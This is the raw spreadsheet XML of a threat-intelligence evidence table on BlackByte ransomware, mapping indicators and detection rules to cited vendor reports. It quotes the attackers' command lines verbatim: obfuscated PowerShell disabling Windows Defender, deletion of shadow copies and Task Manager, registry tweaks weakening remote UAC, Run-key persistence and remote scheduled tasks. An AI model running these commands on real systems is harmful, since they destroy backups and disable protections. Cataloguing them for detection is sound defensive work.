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ransom/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A0417A61-4908-3A4B-B0ED-A12A9E79A5F3}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="20" yWindow="-21100" windowWidth="38380" windowHeight="21100" activeTab="1" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
  </bookViews>
  <sheets>
    <sheet name="sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
  </sheets>
  <calcPr calcId="191029"/>
  <pivotCaches>
    <pivotCache cacheId="4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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="421" uniqueCount="217">
  <si>
    <t>eid</t>
  </si>
  <si>
    <t>map_pid</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>eid_type</t>
  </si>
  <si>
    <t>generic</t>
  </si>
  <si>
    <t>taskill.exe /F /IM Raccine.exe</t>
  </si>
  <si>
    <t>taskill.exe /F /IM RaccineSettings.exe</t>
  </si>
  <si>
    <t>blackbyte-eid0001</t>
  </si>
  <si>
    <t>blackbyte-eid0002</t>
  </si>
  <si>
    <t>blackbyte-eid0003</t>
  </si>
  <si>
    <t>blackbyte-eid0004</t>
  </si>
  <si>
    <t>blackbyte-eid0005</t>
  </si>
  <si>
    <t>blackbyte-eid0006</t>
  </si>
  <si>
    <t>blackbyte-eid0007</t>
  </si>
  <si>
    <t>blackbyte-eid0008</t>
  </si>
  <si>
    <t>blackbyte-eid0009</t>
  </si>
  <si>
    <t>blackbyte-eid0010</t>
  </si>
  <si>
    <t>blackbyte-eid0011</t>
  </si>
  <si>
    <t>blackbyte-eid0012</t>
  </si>
  <si>
    <t>blackbyte-eid0013</t>
  </si>
  <si>
    <t>blackbyte-eid0014</t>
  </si>
  <si>
    <t>blackbyte-eid0015</t>
  </si>
  <si>
    <t>blackbyte-eid0016</t>
  </si>
  <si>
    <t>blackbyte-eid0017</t>
  </si>
  <si>
    <t>blackbyte-eid0018</t>
  </si>
  <si>
    <t>blackbyte-eid0019</t>
  </si>
  <si>
    <t>blackbyte-eid0020</t>
  </si>
  <si>
    <t>blackbyte-eid0021</t>
  </si>
  <si>
    <t>blackbyte-eid0022</t>
  </si>
  <si>
    <t>blackbyte-eid0023</t>
  </si>
  <si>
    <t>blackbyte-eid0024</t>
  </si>
  <si>
    <t>blackbyte-eid0025</t>
  </si>
  <si>
    <t>blackbyte-eid0026</t>
  </si>
  <si>
    <t>blackbyte-eid0027</t>
  </si>
  <si>
    <t>blackbyte-eid0028</t>
  </si>
  <si>
    <t>blackbyte-eid0029</t>
  </si>
  <si>
    <t>blackbyte-eid0030</t>
  </si>
  <si>
    <t>blackbyte-eid0031</t>
  </si>
  <si>
    <t>blackbyte-eid0032</t>
  </si>
  <si>
    <t>blackbyte-eid0033</t>
  </si>
  <si>
    <t>blackbyte-eid0034</t>
  </si>
  <si>
    <t>blackbyte-eid0035</t>
  </si>
  <si>
    <t>blackbyte-eid0036</t>
  </si>
  <si>
    <t>blackbyte-eid0037</t>
  </si>
  <si>
    <t>blackbyte-eid0038</t>
  </si>
  <si>
    <t>blackbyte-eid0039</t>
  </si>
  <si>
    <t>blackbyte-eid0040</t>
  </si>
  <si>
    <t>blackbyte-eid0041</t>
  </si>
  <si>
    <t>blackbyte-eid0042</t>
  </si>
  <si>
    <t>blackbyte-eid0043</t>
  </si>
  <si>
    <t>blackbyte-eid0044</t>
  </si>
  <si>
    <t>blackbyte-eid0045</t>
  </si>
  <si>
    <t>blackbyte-eid0046</t>
  </si>
  <si>
    <t>blackbyte-eid0047</t>
  </si>
  <si>
    <t>blackbyte-eid0048</t>
  </si>
  <si>
    <t>blackbyte-eid0049</t>
  </si>
  <si>
    <t>blackbyte-eid0050</t>
  </si>
  <si>
    <t>blackbyte-eid0051</t>
  </si>
  <si>
    <t>blackbyte-eid0052</t>
  </si>
  <si>
    <t>blackbyte-eid0053</t>
  </si>
  <si>
    <t>blackbyte-eid0054</t>
  </si>
  <si>
    <t>blackbyte-eid0055</t>
  </si>
  <si>
    <t>blackbyte-eid0056</t>
  </si>
  <si>
    <t>blackbyte-eid0057</t>
  </si>
  <si>
    <t>blackbyte-eid0058</t>
  </si>
  <si>
    <t>blackbyte-eid0059</t>
  </si>
  <si>
    <t>blackbyte-eid0060</t>
  </si>
  <si>
    <t>blackbyte-eid0061</t>
  </si>
  <si>
    <t>blackbyte-eid0062</t>
  </si>
  <si>
    <t>blackbyte-eid0063</t>
  </si>
  <si>
    <t>blackbyte-eid0064</t>
  </si>
  <si>
    <t>blackbyte-eid0065</t>
  </si>
  <si>
    <t>blackbyte-eid0066</t>
  </si>
  <si>
    <t>blackbyte-eid0067</t>
  </si>
  <si>
    <t>blackbyte-eid0068</t>
  </si>
  <si>
    <t>blackbyte-eid0069</t>
  </si>
  <si>
    <t>blackbyte-eid0070</t>
  </si>
  <si>
    <t>blackbyte-eid0071</t>
  </si>
  <si>
    <t>blackbyte-eid0072</t>
  </si>
  <si>
    <t>blackbyte-eid0073</t>
  </si>
  <si>
    <t>blackbyte-eid0074</t>
  </si>
  <si>
    <t>blackbyte-eid0075</t>
  </si>
  <si>
    <t>blackbyte-eid0076</t>
  </si>
  <si>
    <t>blackbyte-eid0077</t>
  </si>
  <si>
    <t>blackbyte-eid0078</t>
  </si>
  <si>
    <t>blackbyte-eid0079</t>
  </si>
  <si>
    <t>blackbyte-eid0080</t>
  </si>
  <si>
    <t>blackbyte-eid0081</t>
  </si>
  <si>
    <t>blackbyte-eid0082</t>
  </si>
  <si>
    <t>blackbyte-eid0083</t>
  </si>
  <si>
    <t>blackbyte-eid0084</t>
  </si>
  <si>
    <t>blackbyte-eid0085</t>
  </si>
  <si>
    <t>blackbyte-eid0086</t>
  </si>
  <si>
    <t>blackbyte-eid0087</t>
  </si>
  <si>
    <t>blackbyte-eid0088</t>
  </si>
  <si>
    <t>blackbyte-eid0089</t>
  </si>
  <si>
    <t>blackbyte-eid0090</t>
  </si>
  <si>
    <t>blackbyte-eid0091</t>
  </si>
  <si>
    <t>blackbyte-eid0092</t>
  </si>
  <si>
    <t>blackbyte-eid0093</t>
  </si>
  <si>
    <t>blackbyte-eid0094</t>
  </si>
  <si>
    <t>blackbyte-eid0095</t>
  </si>
  <si>
    <t>blackbyte-eid0096</t>
  </si>
  <si>
    <t>blackbyte-eid0097</t>
  </si>
  <si>
    <t>\\127.0.0.1\c$\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\ukbse.aspx</t>
  </si>
  <si>
    <t>From an endpoint perspective, we observed the service MSExchangeMailboxReplication.exe writing an ASPX file to the folder</t>
  </si>
  <si>
    <t>{ "data": "2021-11-30", "url": "https://redcanary.com/blog/threat-intelligence/blackbyte-ransomware/", "tags": ["blackbyte"]}</t>
  </si>
  <si>
    <t>process == msexchangemailboxreplication.exe &amp;&amp; create_filename_extension == .aspx || modify_filename_extension == .aspx</t>
  </si>
  <si>
    <t>process == wuauclt.exe &amp;&amp; process_command_line_contains != “”</t>
  </si>
  <si>
    <t>process spawn with no commandline</t>
  </si>
  <si>
    <t>HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>Process == regedit.exe &amp;&amp; Reg_key == (“HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System”|| “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” || “HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled”) &amp;&amp; command_line_contains == (REG_DWORD&amp;&amp; 1)</t>
  </si>
  <si>
    <t>process == vssadmin.exe &amp;&amp; process_command_line_contains == resize shadowstorage&amp;&amp; (unbounded || 401MB)</t>
  </si>
  <si>
    <t>Process_name == schtasks.exe &amp;&amp; command_line_contains == (delete&amp;&amp; Raccine)</t>
  </si>
  <si>
    <t>C:\Windows\System32\cmd.exe /c for /l %x in (1,1,75) do start wordpad.exe /p C:\Users\tree.dll</t>
  </si>
  <si>
    <t>cmd /c del C:\Windows\System32\Taskmgr.exe /f /q &amp; del C:\Windows\System32\resmon.exe /f /q &amp; powershell -command “$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘Vw’+’BpA’+’G4ARAB’+’lAGYA’+’ZQB’+’uAG’+’QA’));Stop-Service -Name $x;Set-Service -StartupType Disabled $x”</t>
  </si>
  <si>
    <t>cmd /c del C:\Windows\System32\Taskmgr.exe /f /q &amp; del C:\Windows\System32\resmon.exe /f /q &amp; powershell -command “$x =
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(WinDefend));
Stop-Service -Name $x;Set-Service -StartupType Disabled $x”</t>
  </si>
  <si>
    <t>cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded</t>
  </si>
  <si>
    <t>cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB</t>
  </si>
  <si>
    <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Install-WindowsFeature -Name \”RSAT-AD-PowerShell\” –IncludeAllSubFeature</t>
  </si>
  <si>
    <t>powershell -command “Import-Module ActiveDirectory;Get-ADComputer -Filter * -Properties * | FT Name”</t>
  </si>
  <si>
    <t>schtasks.exe /DELETE /TN “\”Raccine Rules Updater\”” /F</t>
  </si>
  <si>
    <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command “$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg’+‘AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC’+‘AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA’+‘F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==’));Invoke-Expression $x”</t>
  </si>
  <si>
    <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command “$x =
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(Get-WmiObject Win32_Shadowcopy |
ForEach-Object {$_.Delete();}));Invoke-Expression $x”</t>
  </si>
  <si>
    <t>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes</t>
  </si>
  <si>
    <t>netsh advfirewall firewall set rule group=”File and Printer Sharing” new enable=Yes</t>
  </si>
  <si>
    <t>cmd.exe /c powershell -command "$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VwBpA'+'G4ARAB'+'lAGYA'+'ZQB'+'uAG'+'QA'));Stop-Service -Name $x;Set-Service -StartupType Disabled $x"</t>
  </si>
  <si>
    <t>{ "data": "2021-02-11", "url": "https://www.ic3.gov/CSA/2022/220211.pdf", "tags": ["blackbyte"]}</t>
  </si>
  <si>
    <t>schtasks.exe /DELETE /TN "\"Raccine Rules Updater\"" /F</t>
  </si>
  <si>
    <t>cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB</t>
  </si>
  <si>
    <t>cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded</t>
  </si>
  <si>
    <t>powershell.exe $x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAwB9AA=='));Invoke-Expression $x</t>
  </si>
  <si>
    <t>sc.exe config SQLTELEMETRY start= disabled</t>
  </si>
  <si>
    <t>sc.exe config SQLTELEMETRY$ECWDB2 start= disabled</t>
  </si>
  <si>
    <t>sc.exe config SQLWriter start= disabled</t>
  </si>
  <si>
    <t>sc.exe config SstpSvc start= disabled</t>
  </si>
  <si>
    <t>powershell.exe Set-MpPreference -EnableControlledFolderAccess Disabled</t>
  </si>
  <si>
    <t>sc.exe config MBAMService start= disabled</t>
  </si>
  <si>
    <t>sc.exe config wuauserv start= disabled</t>
  </si>
  <si>
    <t>sc.exe config Dnscache start= auto</t>
  </si>
  <si>
    <t>sc.exe config fdPHost start= auto</t>
  </si>
  <si>
    <t>sc.exe config FDResPub start= auto</t>
  </si>
  <si>
    <t>sc.exe config SSDPSRV start= auto</t>
  </si>
  <si>
    <t>sc.exe config upnphost start= auto</t>
  </si>
  <si>
    <t>sc.exe config RemoteRegistry start= auto</t>
  </si>
  <si>
    <t>cmd.exe /c netsh advfirewall firewall set rule "group=\"Network Discovery\"" new enable=Yes</t>
  </si>
  <si>
    <t>cmd.exe /c netsh advfirewall firewall set rule "group=\"File and Printer Sharing\"" new enable=Yes</t>
  </si>
  <si>
    <t>cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>mountvol.exe A: \\?\Volume{d7e47829-0000-0000-0000-100000000000}\</t>
  </si>
  <si>
    <t>mountvol.exe B: \\?\Volume{d7e47829-0000-0000-0000-b0e213000000}\</t>
  </si>
  <si>
    <t>mountvol.exe E: \\?\Volume{fce79ce0-b01f-11e6-b968-806e6f6e6963}\</t>
  </si>
  <si>
    <t>powershell.exe Install-WindowsFeature -Name \"RSAT-AD-PowerShell\" –IncludeAllSubFeature</t>
  </si>
  <si>
    <t>net.exe view</t>
  </si>
  <si>
    <t>arp.exe -a</t>
  </si>
  <si>
    <t>powershell.exe Import-Module ActiveDirectory;Get-ADComputer -Filter * -Properties * | FT Name</t>
  </si>
  <si>
    <t>notepad.exe %appdata%\RestoreMyFiles_BlackByte.txt</t>
  </si>
  <si>
    <t>cmd.exe /c ping 1.1.1.1 -n 10 &gt; Nul &amp; Del C:\Users\REM\Desktop\hybrid-9-8\complex.exe</t>
  </si>
  <si>
    <t>powershell.exe $x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x</t>
  </si>
  <si>
    <t>Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}</t>
  </si>
  <si>
    <t>ProxyShell vulnerabilities CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207</t>
  </si>
  <si>
    <t>{ "data": "2023-07-06", "url": "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/", "tags": ["blackbyte"]}</t>
  </si>
  <si>
    <t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 
MsEdgeMsE
rundll32 C:\Users\user\Downloads\api-msvc.dll,Default</t>
  </si>
  <si>
    <t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 
MsEdgeMsE
rundll32 C:\temp\api-msvc.dll,Default</t>
  </si>
  <si>
    <t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
MsEdgeMsE
rundll32 C:\systemtest\api-system.png,Default</t>
  </si>
  <si>
    <t>C:\systemtest\anydesk\AnyDesk.exe
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
C:\Scripts\AnyDesk.exe</t>
  </si>
  <si>
    <t>netscan.exe</t>
  </si>
  <si>
    <t>netapp.exe</t>
  </si>
  <si>
    <t>ExByte</t>
  </si>
  <si>
    <t>cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>cmd /c reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>Trojan:Win32/Kovter!MSR
Trojan:Win64/WinGoObfusc.LK!MT
Trojan:Win64/BlackByte!MSR
HackTool:Win32/AdFind!MSR
Trojan:Win64/CobaltStrike!MSR</t>
  </si>
  <si>
    <t>‘CVE-2021-31207’ exploit malware was detected
An active ‘NetShDisableFireWall’ malware in a command line was prevented from executing.
Suspicious registry modification.
‘Rtcore64’ hacktool was detected
Possible ongoing hands-on-keyboard activity (Cobalt Strike)
A file or network connection related to a ransomware-linked emerging threat activity group detected
Suspicious sequence of exploration activities
A process was injected with potentially malicious code
Suspicious behavior by cmd.exe was observed
‘Blackbyte’ ransomware was detected</t>
  </si>
  <si>
    <t>{ "data": "2021-10-15", "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", "tags": ["blackbyte"]}</t>
  </si>
  <si>
    <t>cscript.exe &lt;malicious JScript launcher&gt;</t>
  </si>
  <si>
    <t>schtasks.exe /DELETE /TN \"Raccine Rules Updater\" /F</t>
  </si>
  <si>
    <t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name = “Raccine Tray”</t>
  </si>
  <si>
    <t>HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine</t>
  </si>
  <si>
    <t>sc.exe config SQLTELEMETRY start = disabled</t>
  </si>
  <si>
    <t>sc.exe config sc SQLTELEMETRY$ECWDB2 start = disabled</t>
  </si>
  <si>
    <t>c.exe config SQLWriter start = disabled</t>
  </si>
  <si>
    <t>sc.exe config SstpSvc start = disabled</t>
  </si>
  <si>
    <t>sc.exe config MBAMService start = disabled</t>
  </si>
  <si>
    <t>sc.exe config wuauserv start = disabled</t>
  </si>
  <si>
    <t>vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=401MB</t>
  </si>
  <si>
    <t>vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=unbounded</t>
  </si>
  <si>
    <t>vssadmin.exe Delete Shadows /all /quiet</t>
  </si>
  <si>
    <t>powershell.exe Get-CimInstance Win32_ShadowCopy | Remove-CimInstance</t>
  </si>
  <si>
    <t>cmd.exe /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin</t>
  </si>
  <si>
    <t>cmd.exe /c rd /s /q D:\\$Recycle.bin</t>
  </si>
  <si>
    <t>netsh advfirewall firewall set rule group="Network Discovery” new enable=Yes</t>
  </si>
  <si>
    <t>netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes</t>
  </si>
  <si>
    <t>powershell.exe Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</t>
  </si>
  <si>
    <t>schtasks.exe &lt;remotehost&gt; /TN joke /TR \"wscript.exe C:\\Users\\Public\\obamka.js\" /sc once /st 00:00 /RL HIGHEST</t>
  </si>
  <si>
    <t>schtasks.exe /S &lt;remotehost&gt; /Run /TN joke</t>
  </si>
  <si>
    <t>cmdline</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t>mde_alerts</t>
  </si>
  <si>
    <t>mdeav_alerts</t>
  </si>
  <si>
    <t>pshell-pid</t>
  </si>
  <si>
    <t>netsh-pid</t>
  </si>
  <si>
    <t>anydesk-pid</t>
  </si>
  <si>
    <t>netscan-pid</t>
  </si>
  <si>
    <t>vss-pid</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of map_pid</t>
  </si>
  <si>
    <t>Count of eid_type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</si>
</sst>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vey Wargo" refreshedDate="45770.297346412037" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="97" xr:uid="{AB83A22D-EBAB-4E47-9EF4-46A1278A5930}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="6">
    <cacheField name="eid" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="map_pid" numFmtId="0">
      <sharedItems containsBlank="1" count="6">
        <m/>
        <s v="pshell-pid"/>
        <s v="netsh-pid"/>
        <s v="anydesk-pid"/>
        <s v="netscan-pid"/>
        <s v="vss-pid"/>
      </sharedItems>
    </cacheField>
    <cacheField name="eid_type" numFmtId="0">
      <sharedItems count="5">
        <s v="cmdline"/>
        <s v="generic"/>
        <s v="htool"/>
        <s v="mdeav_alerts"/>
        <s v="mde_alerts"/>
      </sharedItems>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems count="4">
        <s v="{ &quot;data&quot;: &quot;2021-11-30&quot;, &quot;url&quot;: &quot;https://redcanary.com/blog/threat-intelligence/blackbyte-ransomware/&quot;, &quot;tags&quot;: [&quot;blackbyte&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2021-02-11&quot;, &quot;url&quot;: &quot;https://www.ic3.gov/CSA/2022/220211.pdf&quot;, &quot;tags&quot;: [&quot;blackbyte&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-07-06&quot;, &quot;url&quot;: &quot;https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/&quot;, &quot;tags&quot;: [&quot;blackbyte&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2021-10-15&quot;, &quot;url&quot;: &quot;https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/&quot;, &quot;tags&quot;: [&quot;blackbyte&quot;]}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">
  <r>
    <s v="blackbyte-eid0001"/>
    <x v="0"/>
    <x v="0"/>
    <s v="\\127.0.0.1\c$\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\ukbse.aspx"/>
    <s v="From an endpoint perspective, we observed the service MSExchangeMailboxReplication.exe writing an ASPX file to the folder"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0002"/>
    <x v="0"/>
    <x v="1"/>
    <s v="process == msexchangemailboxreplication.exe &amp;&amp; create_filename_extension == .aspx || modify_filename_extension == .aspx"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0003"/>
    <x v="0"/>
    <x v="1"/>
    <s v="process == wuauclt.exe &amp;&amp; process_command_line_contains != “”"/>
    <s v="process spawn with no commandline"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0004"/>
    <x v="0"/>
    <x v="0"/>
    <s v="HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0005"/>
    <x v="0"/>
    <x v="0"/>
    <s v="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0006"/>
    <x v="0"/>
    <x v="0"/>
    <s v="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0007"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Process == regedit.exe &amp;&amp; Reg_key == (“HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System”|| “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” || “HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled”) &amp;&amp; command_line_contains == (REG_DWORD&amp;&amp; 1)"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0008"/>
    <x v="0"/>
    <x v="1"/>
    <s v="process == vssadmin.exe &amp;&amp; process_command_line_contains == resize shadowstorage&amp;&amp; (unbounded || 401MB)"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0009"/>
    <x v="0"/>
    <x v="1"/>
    <s v="Process_name == schtasks.exe &amp;&amp; command_line_contains == (delete&amp;&amp; Raccine)"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0010"/>
    <x v="0"/>
    <x v="0"/>
    <s v="C:\Windows\System32\cmd.exe /c for /l %x in (1,1,75) do start wordpad.exe /p C:\Users\tree.dll"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0011"/>
    <x v="1"/>
    <x v="0"/>
    <s v="cmd /c del C:\Windows\System32\Taskmgr.exe /f /q &amp; del C:\Windows\System32\resmon.exe /f /q &amp; powershell -command “$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘Vw’+’BpA’+’G4ARAB’+’lAGYA’+’ZQB’+’uAG’+’QA’));Stop-Service -Name $x;Set-Service -StartupType Disabled $x”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0012"/>
    <x v="1"/>
    <x v="0"/>
    <s v="cmd /c del C:\Windows\System32\Taskmgr.exe /f /q &amp; del C:\Windows\System32\resmon.exe /f /q &amp; powershell -command “$x =_x000a_[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(WinDefend));_x000a_Stop-Service -Name $x;Set-Service -StartupType Disabled $x”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0013"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0014"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0015"/>
    <x v="0"/>
    <x v="0"/>
    <s v="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Install-WindowsFeature -Name \”RSAT-AD-PowerShell\” –IncludeAllSubFeature"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0016"/>
    <x v="0"/>
    <x v="0"/>
    <s v="powershell -command “Import-Module ActiveDirectory;Get-ADComputer -Filter * -Properties * | FT Name”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0017"/>
    <x v="0"/>
    <x v="0"/>
    <s v="schtasks.exe /DELETE /TN “\”Raccine Rules Updater\”” /F"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0018"/>
    <x v="0"/>
    <x v="0"/>
    <s v="\\127.0.0.1\c$\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\ukbse.aspx"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0019"/>
    <x v="1"/>
    <x v="0"/>
    <s v="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command “$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg’+‘AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC’+‘AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA’+‘F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==’));Invoke-Expression $x”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="blackbyte-eid0020"/>
    <x v="1"/>
    <x v="0"/>
    <s v="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command “$x =_x000a_[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(Get-WmiObject Win32_Shadowcopy |_x000a_ForEach-Object {$_.Delete();}));Invoke-Expression $x”"/>
    <m/>
